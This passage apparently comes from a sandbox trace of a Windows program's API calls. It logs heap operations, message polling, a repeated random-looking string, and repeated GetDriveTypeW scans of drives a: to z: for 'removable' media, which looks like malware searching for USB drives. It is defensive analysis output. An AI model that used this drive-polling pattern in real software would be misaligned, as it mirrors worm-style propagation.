Size=0x8) returned 0x12ef730 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0210.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0210.348] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0210.348] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.348] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.348] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0210.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.348] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.349] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0210.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.349] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.349] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.349] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.350] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.350] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.350] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.350] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.350] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.350] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.351] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.351] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.351] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.351] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.351] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.352] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.352] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.352] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.352] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.352] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.352] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.353] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.353] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.353] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.353] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.353] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.354] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.354] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.354] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.354] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0210.354] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.354] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.354] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.354] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.354] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.354] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.354] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0210.354] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.354] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.354] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.354] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.354] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0210.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0210.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0210.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0210.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0210.355] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0210.355] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.355] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0210.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0210.356] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0210.356] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0210.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.356] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0210.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0210.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0210.356] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.356] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.357] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.357] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.357] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.357] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.358] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.358] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.358] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.358] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.358] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.358] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.359] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.359] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.359] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.359] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.360] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.360] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.360] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.360] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.360] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.361] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.361] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.361] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.361] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.362] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.362] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0210.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0210.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0210.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.362] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0210.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.363] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0210.363] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0210.363] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0210.725] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.726] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.726] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.726] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0210.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.726] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0210.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.726] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.726] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.727] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.727] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0210.727] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.727] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.727] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.727] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.727] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.727] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.728] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.728] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.728] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.728] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.728] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.728] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.729] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.729] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.729] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.729] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.729] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.730] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.730] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.730] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.730] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.731] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.731] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.731] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.731] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.731] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.732] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.732] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.733] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.733] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.733] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.733] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.733] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.733] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.733] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.734] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.734] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.734] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.734] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.734] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.734] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.734] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.734] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.735] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.735] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.735] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.735] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.735] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.736] GetDriveTypeW 